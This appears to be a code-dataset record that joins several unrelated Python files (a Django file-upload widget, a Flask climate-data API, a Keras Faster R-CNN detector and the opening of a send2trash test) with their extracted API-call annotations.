] | [((174, 234), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Live editing sphinx doc server"""'}), "(description='Live editing sphinx doc server')\n", (188, 234), False, 'from argparse import ArgumentParser\n'), ((668, 686), 'sphinxviewer.server.serve_server', 'serve_server', (['(8888)'], {}), '(8888)\n', (680, 686), False, 'from sphinxviewer.server import serve_server\n'), ((601, 612), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (610, 612), False, 'import os\n'), ((652, 663), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (660, 663), False, 'import sys\n')] |
import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
# add a spinnging wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
| [
"django.utils.translation.ugettext_lazy",
"easy_thumbnails.files.get_thumbnailer",
"mimetypes.guess_type",
"django.forms.utils.flatatt",
"mimetypes.guess_extension",
"django.core.signing.Signer"
] | [((417, 433), 'django.core.signing.Signer', 'signing.Signer', ([], {}), '()\n', (431, 433), False, 'from django.core import signing\n'), ((1915, 1931), 'django.utils.translation.ugettext_lazy', '_', (['"""Delete File"""'], {}), "('Delete File')\n", (1916, 1931), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((4141, 4163), 'easy_thumbnails.files.get_thumbnailer', 'get_thumbnailer', (['value'], {}), '(value)\n', (4156, 4163), False, 'from easy_thumbnails.files import get_thumbnailer\n'), ((1423, 1443), 'django.forms.utils.flatatt', 'flatatt', (['final_attrs'], {}), '(final_attrs)\n', (1430, 1443), False, 'from django.forms.utils import flatatt\n'), ((1685, 1707), 'django.forms.utils.flatatt', 'flatatt', (['spinner_attrs'], {}), '(spinner_attrs)\n', (1692, 1707), False, 'from django.forms.utils import flatatt\n'), ((2145, 2164), 'django.forms.utils.flatatt', 'flatatt', (['icon_attrs'], {}), '(icon_attrs)\n', (2152, 2164), False, 'from django.forms.utils import flatatt\n'), ((2353, 2371), 'django.utils.translation.ugettext_lazy', '_', (['"""Download File"""'], {}), "('Download File')\n", (2354, 2371), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((2879, 2916), 'mimetypes.guess_type', 'mimetypes.guess_type', (['value.file.name'], {}), '(value.file.name)\n', (2899, 2916), False, 'import mimetypes\n'), ((2629, 2652), 'django.forms.utils.flatatt', 'flatatt', (['download_attrs'], {}), '(download_attrs)\n', (2636, 2652), False, 'from django.forms.utils import flatatt\n'), ((2945, 2984), 'mimetypes.guess_extension', 'mimetypes.guess_extension', (['content_type'], {}), '(content_type)\n', (2970, 2984), False, 'import mimetypes\n')] |
from flask import jsonify, render_template
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
import datetime as dt
from climateapp import app
engine = create_engine('sqlite:///../Resources/hawaii.sqlite')
Base = automap_base()
Base.prepare(engine,reflect=True)
Measurements = Base.classes.measurement
Stations = Base.classes.station
@app.route('/')
def home():
return render_template('index.html')
@app.route('/api/v1.0/precipitation')
def perciptation():
session = Session(engine)
lastDate = session.query(Measurements.date).order_by(Measurements.date.desc()).first()
for row in lastDate:
date = dt.datetime.strptime(row,"%Y-%m-%d")
sel = [Measurements.date,
func.sum(Measurements.prcp)]
data = session.query(*sel).filter(func.strftime("%Y-%m-%d)", Measurements.date) >= str((date - dt.timedelta(days=365)))).\
group_by(Measurements.date).all()
session.close()
returnList = []
for row in data:
dateDict = {}
dateDict["date"] = row.date
dateDict["prcp"] = row[1]
returnList.append(dateDict)
return jsonify(returnList)
@app.route('/api/v1.0/stations')
def stations():
session = Session(engine)
data = session.query(Stations.station, Stations.name).all()
session.close()
returnList = []
for row in data:
stationDict = {}
stationDict["station"] = row.station
stationDict["name"] = row.name
returnList.append(stationDict)
return jsonify(returnList)
@app.route('/api/v1.0/tobs')
def tobs():
session = Session(engine)
sel = [Stations.station,
func.count(Measurements.station)]
rankedStations = session.query(*sel).filter(Measurements.station == Stations.station).\
group_by(Measurements.station).order_by(func.count(Measurements.station).desc()).first()
for row in rankedStations:
bestId = rankedStations.station
sel = [Stations.station,
func.min(Measurements.tobs),
func.max(Measurements.tobs),
func.avg(Measurements.tobs)
]
data = session.query(*sel).\
filter(Measurements.station == Stations.station).\
filter(Stations.station == bestId).all()
session.close()
returnList = []
for row in data:
tobsDict = {}
tobsDict["station"] = row.station
tobsDict["min"] = row[1]
tobsDict["max"] = row[2]
tobsDict["avg"] = row[3]
returnList.append(tobsDict)
return jsonify(returnList)
@app.route('/api/v1.0/<start>')
def start(start):
session = Session(engine)
data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
filter(Measurements.date >= start).all()
return jsonify(data)
@app.route('/api/v1.0/<start>/<end>')
def dateRange(start,end):
session = Session(engine)
data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
filter(Measurements.date >= start).\
filter(Measurements.date <= end).all()
return jsonify(data) | [
"flask.render_template",
"climateapp.app.route",
"sqlalchemy.func.count",
"sqlalchemy.func.sum",
"sqlalchemy.func.min",
"datetime.datetime.strptime",
"sqlalchemy.ext.automap.automap_base",
"sqlalchemy.create_engine",
"sqlalchemy.orm.Session",
"sqlalchemy.func.max",
"sqlalchemy.func.strftime",
... | [((246, 299), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///../Resources/hawaii.sqlite"""'], {}), "('sqlite:///../Resources/hawaii.sqlite')\n", (259, 299), False, 'from sqlalchemy import create_engine, func\n'), ((308, 322), 'sqlalchemy.ext.automap.automap_base', 'automap_base', ([], {}), '()\n', (320, 322), False, 'from sqlalchemy.ext.automap import automap_base\n'), ((432, 446), 'climateapp.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (441, 446), False, 'from climateapp import app\n'), ((499, 535), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/precipitation"""'], {}), "('/api/v1.0/precipitation')\n", (508, 535), False, 'from climateapp import app\n'), ((1159, 1190), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/stations"""'], {}), "('/api/v1.0/stations')\n", (1168, 1190), False, 'from climateapp import app\n'), ((1509, 1536), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/tobs"""'], {}), "('/api/v1.0/tobs')\n", (1518, 1536), False, 'from climateapp import app\n'), ((2402, 2432), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/<start>"""'], {}), "('/api/v1.0/<start>')\n", (2411, 2432), False, 'from climateapp import app\n'), ((2657, 2693), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/<start>/<end>"""'], {}), "('/api/v1.0/<start>/<end>')\n", (2666, 2693), False, 'from climateapp import app\n'), ((467, 496), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (482, 496), False, 'from flask import jsonify, render_template\n'), ((567, 582), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (574, 582), False, 'from sqlalchemy.orm import Session\n'), ((1137, 1156), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (1144, 1156), False, 'from flask import jsonify, render_template\n'), ((1219, 1234), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (1226, 1234), False, 'from sqlalchemy.orm import Session\n'), ((1487, 1506), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (1494, 1506), False, 'from flask import jsonify, render_template\n'), ((1561, 1576), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (1568, 1576), False, 'from sqlalchemy.orm import Session\n'), ((2380, 2399), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (2387, 2399), False, 'from flask import jsonify, render_template\n'), ((2462, 2477), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (2469, 2477), False, 'from sqlalchemy.orm import Session\n'), ((2641, 2654), 'flask.jsonify', 'jsonify', (['data'], {}), '(data)\n', (2648, 2654), False, 'from flask import jsonify, render_template\n'), ((2731, 2746), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (2738, 2746), False, 'from sqlalchemy.orm import Session\n'), ((2948, 2961), 'flask.jsonify', 'jsonify', (['data'], {}), '(data)\n', (2955, 2961), False, 'from flask import jsonify, render_template\n'), ((705, 742), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['row', '"""%Y-%m-%d"""'], {}), "(row, '%Y-%m-%d')\n", (725, 742), True, 'import datetime as dt\n'), ((775, 802), 'sqlalchemy.func.sum', 'func.sum', (['Measurements.prcp'], {}), '(Measurements.prcp)\n', (783, 802), False, 'from sqlalchemy import create_engine, func\n'), ((1608, 1640), 'sqlalchemy.func.count', 'func.count', (['Measurements.station'], {}), '(Measurements.station)\n', (1618, 1640), False, 'from sqlalchemy import create_engine, func\n'), ((1923, 1950), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (1931, 1950), False, 'from sqlalchemy import create_engine, func\n'), ((1957, 1984), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (1965, 1984), False, 'from sqlalchemy import create_engine, func\n'), ((1991, 2018), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (1999, 2018), False, 'from sqlalchemy import create_engine, func\n'), ((1778, 1810), 'sqlalchemy.func.count', 'func.count', (['Measurements.station'], {}), '(Measurements.station)\n', (1788, 1810), False, 'from sqlalchemy import create_engine, func\n'), ((2500, 2527), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2508, 2527), False, 'from sqlalchemy import create_engine, func\n'), ((2529, 2556), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2537, 2556), False, 'from sqlalchemy import create_engine, func\n'), ((2558, 2585), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2566, 2585), False, 'from sqlalchemy import create_engine, func\n'), ((840, 885), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%Y-%m-%d)"""', 'Measurements.date'], {}), "('%Y-%m-%d)', Measurements.date)\n", (853, 885), False, 'from sqlalchemy import create_engine, func\n'), ((2769, 2796), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2777, 2796), False, 'from sqlalchemy import create_engine, func\n'), ((2798, 2825), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2806, 2825), False, 'from sqlalchemy import create_engine, func\n'), ((2827, 2854), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2835, 2854), False, 'from sqlalchemy import create_engine, func\n'), ((901, 923), 'datetime.timedelta', 'dt.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (913, 923), True, 'import datetime as dt\n')] |
"""fasterRCNN对象创建"""
import numpy as np
import colorsys
import os
from keras import backend as K
from keras.applications.imagenet_utils import preprocess_input
from PIL import Image, ImageFont, ImageDraw
import copy
import math
from net import fasterrcnn as frcnn
from net import netconfig as netconfig
from net import RPN as RPN
from net import tools as tools
class FasterRCNN(object):
_defaults = {
"model_path": './model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5',
"classes_path": './model_data/index.txt',
"confidence": 0.7,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
"""初始化faster RCNN"""
self.__dict__.update(self._defaults)
self.class_names = self._get_class()
self.sess = K.get_session()
self.config = netconfig.Config()
self.generate()
self.bbox_util = tools.BBoxUtility()
self.confidence = 0.7
self.classes_path='./model_data/index.txt'
self.model_path='./model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5'
def _get_class(self):
"""获得所有的分类"""
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def generate(self):
"""获得所有的分类"""
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# 计算总的种类
self.num_classes = len(self.class_names) + 1
# 载入模型,如果原来的模型里已经包括了模型结构则直接载入。
# 否则先构建模型再载入
self.model_rpn, self.model_classifier = frcnn.get_predict_model(self.config, self.num_classes)
self.model_rpn.load_weights(self.model_path, by_name=True)
self.model_classifier.load_weights(self.model_path, by_name=True, skip_mismatch=True)
print('{} model, anchors, and classes loaded.'.format(model_path))
# 画框设置不同的颜色
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
def get_img_output_length(self, width, height):
def get_output_length(input_length):
# input_length += 6
filter_sizes = [7, 3, 1, 1]
padding = [3, 1, 0, 0]
stride = 2
for i in range(4):
# input_length = (input_length - filter_size + stride) // stride
input_length = (input_length + 2 * padding[i] - filter_sizes[i]) // stride + 1
return input_length
return get_output_length(width), get_output_length(height)
def detect_image(self, image):
"""检测图片"""
image_shape = np.array(np.shape(image)[0:2])
old_width = image_shape[1]
old_height = image_shape[0]
# 保存原始图片
old_image = copy.deepcopy(image)
# 把图片的最短边resize到600
width, height = tools.get_new_img_size(old_width, old_height)
image = image.resize([width, height])
# 图片转成数组
photo = np.array(image, dtype=np.float64)
# 图片预处理,归一化
photo = preprocess_input(np.expand_dims(photo, 0))
# 使用RPN预测,获得概率x_class和x_regr
preds = self.model_rpn.predict(photo)
# 将预测结果进行解码
# 获得所有先验框
anchors = RPN.create_anchor(self.get_img_output_length(width, height), width, height)
# 解码获得建议框,这里得到了300个建议框,注意其坐标均为0-1间
rpn_results = self.bbox_util.detection_out(preds, anchors, 1, confidence_threshold=0)
# 将返回的0-1的建议框映射到共享特征图,如果特征图为38*38,值域变成0-38之间,R为300行4列,分别是左上角右下角坐标
R = rpn_results[0][:, 2:]
R[:, 0] = np.array(np.round(R[:, 0] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 1] = np.array(np.round(R[:, 1] * height / self.config.rpn_stride), dtype=np.int32)
R[:, 2] = np.array(np.round(R[:, 2] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 3] = np.array(np.round(R[:, 3] * height / self.config.rpn_stride), dtype=np.int32)
print(R)
# R转换一下,前两列是左上角坐标,后两列是宽和高
R[:, 2] -= R[:, 0]
R[:, 3] -= R[:, 1]
base_layer = preds[2]
delete_line = []
for i, r in enumerate(R):
if r[2] < 1 or r[3] < 1:
delete_line.append(i)
R = np.delete(R, delete_line, axis=0)
bboxes = []
probs = []
labels = []
# 分批次遍历建议框,每批32个
for jk in range(R.shape[0] // self.config.num_rois + 1):
# 取出32个建议框
ROIs = np.expand_dims(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :], axis=0)
# 判断建议框是否有效
if ROIs.shape[1] == 0:
break
# 对最后一次整除不全,不能到32个的建议框小批进行填充
if jk == R.shape[0] // self.config.num_rois:
# pad R
curr_shape = ROIs.shape
target_shape = (curr_shape[0], self.config.num_rois, curr_shape[2])
ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
ROIs_padded[:, :curr_shape[1], :] = ROIs
ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
ROIs = ROIs_padded
# 将共享特征层和建议框传入end_classifier进行预测
# P_cls为(Batch_size,32个建议框,21)
# P_regr为(Batch_size,32个建议框,80)
[P_cls, P_regr] = self.model_classifier.predict([base_layer, ROIs])
# 判断输出的每批中每个建议框是否真实包含我们要的物体,本身置信度阈值设置为0.9,如果是背景也要跳过
for ii in range(P_cls.shape[1]):
# P_cls[0, ii, :-1]是21个概率组成的列表
if np.max(P_cls[0, ii, :-1]) < self.confidence or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
continue
# 获得label
label = np.argmax(P_cls[0, ii, :-1])
# 获得坐标信息
(x, y, w, h) = ROIs[0, ii, :]
# 其实就是label
cls_num = np.argmax(P_cls[0, ii, :-1])
# 获取框的信息,并改变数量级
(tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
tx /= self.config.classifier_regr_std[0]
ty /= self.config.classifier_regr_std[1]
tw /= self.config.classifier_regr_std[2]
th /= self.config.classifier_regr_std[3]
# 获取到共享特征层上真实的坐标信息
cx = x + w / 2.
cy = y + h / 2.
cx1 = tx * w + cx
cy1 = ty * h + cy
w1 = math.exp(tw) * w
h1 = math.exp(th) * h
x1 = cx1 - w1 / 2.
y1 = cy1 - h1 / 2.
x2 = cx1 + w1 / 2
y2 = cy1 + h1 / 2
x1 = int(round(x1))
y1 = int(round(y1))
x2 = int(round(x2))
y2 = int(round(y2))
# bboxes是最终从300个建议框过滤出来与目标物体对应的建议框
# 但注意,这里的建议框还是存在重叠现象,因为之前仅仅靠物体置信度来筛选
bboxes.append([x1, y1, x2, y2])
probs.append(np.max(P_cls[0, ii, :-1]))
labels.append(label)
# 没检测到物体,返回
if len(bboxes) == 0:
return old_image
# 将38*38特征层的建议框映射到600*600
# 筛选出其中得分高于confidence的框,因此此时需要再次NMS删除重叠框
labels = np.array(labels)
probs = np.array(probs)
boxes = np.array(bboxes, dtype=np.float32)
boxes[:, 0] = boxes[:, 0] * self.config.rpn_stride / width
boxes[:, 1] = boxes[:, 1] * self.config.rpn_stride / height
boxes[:, 2] = boxes[:, 2] * self.config.rpn_stride / width
boxes[:, 3] = boxes[:, 3] * self.config.rpn_stride / height
results = np.array(
self.bbox_util.nms_for_out(np.array(labels), np.array(probs), np.array(boxes), self.num_classes - 1, 0.4))
top_label_indices = results[:, 0]
top_conf = results[:, 1]
boxes = results[:, 2:]
#top_label_indices=labels
#top_conf=probs
# 大小调整到原图上,此时已经完成了建议框的计算
boxes[:, 0] = boxes[:, 0] * old_width
boxes[:, 1] = boxes[:, 1] * old_height
boxes[:, 2] = boxes[:, 2] * old_width
boxes[:, 3] = boxes[:, 3] * old_height
# simhei.ttf用于设置字体
font = ImageFont.truetype(font='model_data/simhei.ttf',size=np.floor(3e-2 * np.shape(image)[1] + 0.5).astype('int32'))
thickness = (np.shape(old_image)[0] + np.shape(old_image)[1]) // old_width * 2
image = old_image
for i, c in enumerate(top_label_indices):
predicted_class = self.class_names[int(c)]
score = top_conf[i]
left, top, right, bottom = boxes[i]
top = top - 5
left = left - 5
bottom = bottom + 5
right = right + 5
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(np.shape(image)[0], np.floor(bottom + 0.5).astype('int32'))
right = min(np.shape(image)[1], np.floor(right + 0.5).astype('int32'))
# 画框框
label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
label = label.encode('utf-8')
print(label)
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[int(c)])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[int(c)])
draw.text(text_origin, str(label, 'UTF-8'), fill=(0, 0, 0), font=font)
del draw
return image
def close(self):
self.sess.close() | [
"net.tools.get_new_img_size",
"colorsys.hsv_to_rgb",
"numpy.array",
"PIL.ImageDraw.Draw",
"copy.deepcopy",
"math.exp",
"numpy.delete",
"numpy.max",
"numpy.round",
"os.path.expanduser",
"net.tools.BBoxUtility",
"net.fasterrcnn.get_predict_model",
"numpy.floor",
"numpy.argmax",
"numpy.shap... | [((938, 953), 'keras.backend.get_session', 'K.get_session', ([], {}), '()\n', (951, 953), True, 'from keras import backend as K\n'), ((976, 994), 'net.netconfig.Config', 'netconfig.Config', ([], {}), '()\n', (992, 994), True, 'from net import netconfig as netconfig\n'), ((1044, 1063), 'net.tools.BBoxUtility', 'tools.BBoxUtility', ([], {}), '()\n', (1061, 1063), True, 'from net import tools as tools\n'), ((1301, 1338), 'os.path.expanduser', 'os.path.expanduser', (['self.classes_path'], {}), '(self.classes_path)\n', (1319, 1338), False, 'import os\n'), ((1567, 1602), 'os.path.expanduser', 'os.path.expanduser', (['self.model_path'], {}), '(self.model_path)\n', (1585, 1602), False, 'import os\n'), ((1871, 1925), 'net.fasterrcnn.get_predict_model', 'frcnn.get_predict_model', (['self.config', 'self.num_classes'], {}), '(self.config, self.num_classes)\n', (1894, 1925), True, 'from net import fasterrcnn as frcnn\n'), ((3270, 3290), 'copy.deepcopy', 'copy.deepcopy', (['image'], {}), '(image)\n', (3283, 3290), False, 'import copy\n'), ((3344, 3389), 'net.tools.get_new_img_size', 'tools.get_new_img_size', (['old_width', 'old_height'], {}), '(old_width, old_height)\n', (3366, 3389), True, 'from net import tools as tools\n'), ((3469, 3502), 'numpy.array', 'np.array', (['image'], {'dtype': 'np.float64'}), '(image, dtype=np.float64)\n', (3477, 3502), True, 'import numpy as np\n'), ((4711, 4744), 'numpy.delete', 'np.delete', (['R', 'delete_line'], {'axis': '(0)'}), '(R, delete_line, axis=0)\n', (4720, 4744), True, 'import numpy as np\n'), ((7633, 7649), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (7641, 7649), True, 'import numpy as np\n'), ((7666, 7681), 'numpy.array', 'np.array', (['probs'], {}), '(probs)\n', (7674, 7681), True, 'import numpy as np\n'), ((7698, 7732), 'numpy.array', 'np.array', (['bboxes'], {'dtype': 'np.float32'}), '(bboxes, dtype=np.float32)\n', (7706, 7732), True, 'import numpy as np\n'), ((3557, 3581), 'numpy.expand_dims', 'np.expand_dims', (['photo', '(0)'], {}), '(photo, 0)\n', (3571, 3581), True, 'import numpy as np\n'), ((4073, 4123), 'numpy.round', 'np.round', (['(R[:, 0] * width / self.config.rpn_stride)'], {}), '(R[:, 0] * width / self.config.rpn_stride)\n', (4081, 4123), True, 'import numpy as np\n'), ((4168, 4219), 'numpy.round', 'np.round', (['(R[:, 1] * height / self.config.rpn_stride)'], {}), '(R[:, 1] * height / self.config.rpn_stride)\n', (4176, 4219), True, 'import numpy as np\n'), ((4264, 4314), 'numpy.round', 'np.round', (['(R[:, 2] * width / self.config.rpn_stride)'], {}), '(R[:, 2] * width / self.config.rpn_stride)\n', (4272, 4314), True, 'import numpy as np\n'), ((4359, 4410), 'numpy.round', 'np.round', (['(R[:, 3] * height / self.config.rpn_stride)'], {}), '(R[:, 3] * height / self.config.rpn_stride)\n', (4367, 4410), True, 'import numpy as np\n'), ((4938, 5029), 'numpy.expand_dims', 'np.expand_dims', (['R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :]'], {'axis': '(0)'}), '(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1),\n :], axis=0)\n', (4952, 5029), True, 'import numpy as np\n'), ((9503, 9524), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (9517, 9524), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((3140, 3155), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (3148, 3155), True, 'import numpy as np\n'), ((6153, 6181), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (6162, 6181), True, 'import numpy as np\n'), ((6308, 6336), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (6317, 6336), True, 'import numpy as np\n'), ((8070, 8086), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (8078, 8086), True, 'import numpy as np\n'), ((8088, 8103), 'numpy.array', 'np.array', (['probs'], {}), '(probs)\n', (8096, 8103), True, 'import numpy as np\n'), ((8105, 8120), 'numpy.array', 'np.array', (['boxes'], {}), '(boxes)\n', (8113, 8120), True, 'import numpy as np\n'), ((9716, 9753), 'numpy.array', 'np.array', (['[left, top - label_size[1]]'], {}), '([left, top - label_size[1]])\n', (9724, 9753), True, 'import numpy as np\n'), ((9802, 9827), 'numpy.array', 'np.array', (['[left, top + 1]'], {}), '([left, top + 1])\n', (9810, 9827), True, 'import numpy as np\n'), ((2344, 2367), 'colorsys.hsv_to_rgb', 'colorsys.hsv_to_rgb', (['*x'], {}), '(*x)\n', (2363, 2367), False, 'import colorsys\n'), ((6867, 6879), 'math.exp', 'math.exp', (['tw'], {}), '(tw)\n', (6875, 6879), False, 'import math\n'), ((6905, 6917), 'math.exp', 'math.exp', (['th'], {}), '(th)\n', (6913, 6917), False, 'import math\n'), ((7389, 7414), 'numpy.max', 'np.max', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (7395, 7414), True, 'import numpy as np\n'), ((9259, 9274), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (9267, 9274), True, 'import numpy as np\n'), ((9343, 9358), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (9351, 9358), True, 'import numpy as np\n'), ((5385, 5407), 'numpy.zeros', 'np.zeros', (['target_shape'], {}), '(target_shape)\n', (5393, 5407), True, 'import numpy as np\n'), ((5974, 5999), 'numpy.max', 'np.max', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (5980, 5999), True, 'import numpy as np\n'), ((6021, 6047), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6030, 6047), True, 'import numpy as np\n'), ((8713, 8732), 'numpy.shape', 'np.shape', (['old_image'], {}), '(old_image)\n', (8721, 8732), True, 'import numpy as np\n'), ((8738, 8757), 'numpy.shape', 'np.shape', (['old_image'], {}), '(old_image)\n', (8746, 8757), True, 'import numpy as np\n'), ((9133, 9152), 'numpy.floor', 'np.floor', (['(top + 0.5)'], {}), '(top + 0.5)\n', (9141, 9152), True, 'import numpy as np\n'), ((9196, 9216), 'numpy.floor', 'np.floor', (['(left + 0.5)'], {}), '(left + 0.5)\n', (9204, 9216), True, 'import numpy as np\n'), ((9279, 9301), 'numpy.floor', 'np.floor', (['(bottom + 0.5)'], {}), '(bottom + 0.5)\n', (9287, 9301), True, 'import numpy as np\n'), ((9363, 9384), 'numpy.floor', 'np.floor', (['(right + 0.5)'], {}), '(right + 0.5)\n', (9371, 9384), True, 'import numpy as np\n'), ((8648, 8663), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (8656, 8663), True, 'import numpy as np\n')] |
# coding: utf-8
import os
import shutil
import sys
import unittest
from os import path as op
from tempfile import gettempdir
from send2trash import send2trash as s2t
# import the two versions as well as the "automatic" version
from send2trash.plat_win_modern import send2trash as s2t_modern
from send2trash.plat_win_legacy import send2trash as s2t_legacy
